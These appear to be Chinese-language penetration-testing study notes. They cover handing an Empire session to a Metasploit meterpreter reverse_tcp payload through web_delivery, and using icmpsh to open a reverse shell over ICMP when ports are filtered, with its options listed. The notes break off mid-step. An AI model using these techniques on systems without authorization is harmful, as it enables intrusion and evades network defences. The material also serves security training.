empire会话传递
- 获取session(特权用户传递会继承到特权)
- 进入msf模块:
exploit/multi/script/web_delivery
–> target: PSH –> paylaod: windows/meterpreter/reverse_tcp –> 监听 - 使用模块:
code_execution/invoke_metasploitpayload
–> 设置Agent, URL(根据msf生成的url去设置) - 执行传递
端口转发和代理
Windows: mstsc
linux: rdesktop
ICMP
ICMPSH
需要在同网段下去做, 如果端口受到限制, 那我们就可以用ICMPSH这款工具去反弹shell
前提: ping未被禁用
依赖环境: python-impacket(python2版本的) pip2 install impacket
icmsh_m.py 源IP 目标IP
icmpsh.exe:
-t target –> 源IP
-d delay 500
–> 延迟的毫秒数
-s bytes 128
–> 缓冲区的大小
-b max blank 30
–> 最大的空白数
1 | 1. 现在kali设置ping代替应答 |